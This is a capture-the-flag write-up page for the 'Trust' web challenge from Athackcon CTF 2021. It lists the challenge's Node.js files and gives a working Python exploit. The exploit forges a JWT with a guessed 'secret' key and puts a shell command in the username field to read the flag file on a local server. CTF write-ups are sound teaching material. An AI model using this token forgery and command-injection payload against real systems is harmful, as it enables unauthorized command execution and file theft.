Diefunction
  • About
  • Vulnerabilities
    • GHSL-2021-023 / CVE-2021-32819
  • BlachatMEA Finals 2024
  • CTF
    • Technology Control Company
      • Athackcon CTF 2021
        • Trust
        • Config
        • Extend
        • Poison
      • Blackhat MEA 2022
        • CTF Setup on Kali linux
        • Careers
        • SOC Complaints
    • Athackcon
      • POLL
    • Cyber Night 3
      • Client Hell
    • BlackHatMEA Quals 2022
      • Spatify
      • PeehPee
      • Meme generator
      • Black notes
      • Jimmy's blog
    • BlackHatMEA Quals 2023
      • Web - Hardy
      • Web - Authy
      • Reverse engineering - light up the server
    • BlackhatMEA Finals 2024
      • PWN
    • BITSCTF - Reverse Mishap
    • Cybernights 2025
      • REVERSE
      • PWN
    • BYUCTF 2025
      • PWN
Powered by GitBook
On this page
  • Project
  • Solution

Was this helpful?

  1. CTF
  2. Technology Control Company
  3. Athackcon CTF 2021

Trust

PreviousAthackcon CTF 2021NextConfig

Last updated 3 years ago

Was this helpful?

Structure

trust
├── src/ 
│   ├── controllers/ 
│       └── users.js 
│   ├── middlewares/ 
│       ├── authenticate.js 
│       └── error.js 
│   └── routes/ 
│       └── users.js 
│   ├── app.js 
│   ├── package.json 
│   └── flag.txt 
├── .dockerignore
└── Dockerfile 

Solution

Install pip

sudo apt install python3-pip

Install pyjwt and requests

python3 -m pip install pyjwt requests

Exploit

import jwt
from requests import get

host = '127.0.0.1'
port = '8000'

payload = {
    'username': ' > /dev/null && cat /usr/src/app/flag.txt'
}
key = 'secret'

headers = {'Authorization': jwt.encode(payload = payload, key = key)}

flag = get(f'http://{host}:{port}/api/user/system/exist', headers = headers).text
print(flag)

Run the script

python3 exploit.py

Output

{"message":"username exists","output":"TCC{34$Y_c0mmAND_1nJ3c710n}"}
Project